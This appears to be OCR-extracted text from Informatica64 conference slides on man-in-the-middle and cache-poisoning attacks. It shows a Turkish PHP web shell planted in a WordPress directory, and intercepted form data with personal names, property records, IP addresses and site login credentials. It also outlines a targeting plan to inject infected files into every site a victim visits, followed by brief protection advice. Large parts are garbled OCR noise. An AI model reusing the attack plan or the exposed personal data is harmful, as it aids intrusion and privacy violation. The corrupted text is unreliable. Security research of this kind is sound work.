Ana Dizin I MySQL Baqlan I MySQL Yukle & Indir I Komut Calistir I PHP Bilgisi I Eval PHP Kod I Back Connect Dosya Yoneticisi - Gecerli Disk Ucretsiz 91.95 G of 431.72 G (21.3%) Bulundugun Dizin (Writable, 0755} PhpSpyVer: 2010 Safe Mode:Yes /h o m e/tre n d/p u b I i c_htm l/d e m o/tre n d h a b e r/wp-i n cl u d e s/cs si Ana Dizin | Yazilabilir Goster | Dizin Olusturmak | Dosya Olustur j Seleccionar archivo | No se ha ... archive Aff Son Degistirilme Boyut Chmod Isle-rn = Ust Dizin □ admin-bar-rtl.css 2012-02-10 00:21:07 2.95 K 0644/-rw-r-r- Indir I Kooyala I Duzenle I Yeni Ad I Zaman □ admin-bar-rtl.dev.css 2012-02-10 00:21:07 3.48 K 0644/-rw-r-r- Indir I Kooyala I Duzenle I Yeni Ad I Zaman □ admin-bar. ess 2012-02-10 00:21:07 10.67 K 0644/-rw-r-r- Indir I Kopyala I Duzenle I Yeni Ad I Zaman Elements "{^] Resources I <@ Network I ^ Scripts (^Timeline ^ Profiles '^Audits Console Search Network fJame Path <> casus. php * /d emo/tren d h a ber/w p— in elude I ^ © Headers Preview Response Cookies Timing Request URL: http: // jino.ji .f unpic .org/lq/security . js Request Method: GET Status Code: £464 Not Found ▼ Request Headers view source © © ( Cocumen:s Stylesheets Images Scripts XHR Fon:s WebSockets 0:her Intranets 1S9.254. 133.50 CDlon nDmbreCompleto=LIC. GUSTAVO MUNOZ DOMINGUEZ folio So liortu d = estadoAvaluo=CP f ech a C rea cio n = 1 /0 3/20 1 2 cv eCatastra l= 0S60 OSO 040 =bcc nomPropCompleto=FELIPA CAMACHO REYES su pCD n stru ccio n = 1 6 S . 87 su pTerren □ =790 .97 g iro = H AB TACIO N AL rag imen = PARIICU LARE S lote=Q04 manzana=00S tipoAvaluo=AN anioRef=0 tipoQperacion=2 supTerrenoEsc= numColonia=1-C tipoCalle=1 numCalle=-1 numExt=6 numlnt= codigoPost=27-10 ubieacion = imagen = =Subir Croquis =Graba Solicitud =Votver mDde=nueva 189.254.1 33.50 colon usuario web=N0T9 ;eb=GUS~AVO09 Informatica www.iriformatica64.com And, of course, PrOn HalUiii (lihujo: en uiih i^K sLi El desmtmtaj* dVf rjtpcdala rn 1 air nria ha torprtndida a todat con un prDcr so dc r*rioijracricjn del t\T\pto. San aparrcido tnanodF simM&f fttiicoa dt win fttnMtorf, mpcfrlw y fold. prnes de It ace 700 alios Eat* no #i cl cuo unira y ximllam ilua.lrn.rio 11 hin oparceido il Inktkurs* tabor*? renovation en ftdirVLo* ajitJ^LLij-* Lihc ln\.r m!u 1 lira-, l^t^sJjiv DIBUJAR PENES Incluso una iglasia as buan lugar para sacarhj Da Vinci interior Informatica www.iriformatica64.com [+] [-] chaturbate.com 2 forms S525 1ttB 154 csrf middle wa retaken =ac23ebbeSE^b7??sdddcbb-GME3ca 30 M=guy4gals rernemberme=on = login n ext=/a ceo u ntsAeg ister/ csrfmlddlewaretDken=ac23ebbeSE-b733edddcbri4041 53ca9Q = undefined |=lolitata -wolverine birthday_month=4 birthday_day=- birthday_year=13S6 gender=f terms=on coreg_xp=on =Create Free Account 122 164 227 37 csrfmiddle waretoken=ac23ebbe5E-b733edddcbb-uM E3ca9Q I=guy4gals IS |= wolverine rememberme=on =lo gin next=/auth/login/ next= csrfmiddlewaretoken=ac23ebbeSE-b733edddcbb4041 53ca90 = undefined I=guy4gals IB B= wolverine rememberme=on =lo gin Informatica www.iriformatica64.conH Do Payloads: Infect webs for the future H Tuenti z I I := I • s GET 200 OK 200 OK 200 OK 200 undefined a pplicatio n/x-ja vascript image/gif image/gif image/gif /?m=login:B Script /?m=login:11 Parser http://www.coo Redirect /?m=login:3 Parser 1.05KB 456ms OB 454ms 49.51 KB 734ms 155.49KE 269ms 51 2B 269ms 42B 267ms SQ9B [269ms 43B http://cm.o.doubl 1 . SKB 437ms Documents Stylesheets Images Scripts XHR Fonts Web-Sockets Other -1 © Informatica www.iriformatica64.com Targeting Attacks • Select the Target • Bank • Social Network • Intranet • Analyze loaded files • Payload: • Inject and load a infected file for that target, in every web the victim visits. • Profit. Informatica www.iriformatica64.conH Demo Facebook Informatica www.iriformatica64.coni Protections • Take care of mitm schemas Proxy • TOR networks • After using them, clean all Cache is not your friend on the Internet VPNs is not a silver bullet Informatica www.iriformatica64.coni Questions? chema@informatica64.com mfernandez@informatica64.com Informatica www.iriformatica64.coni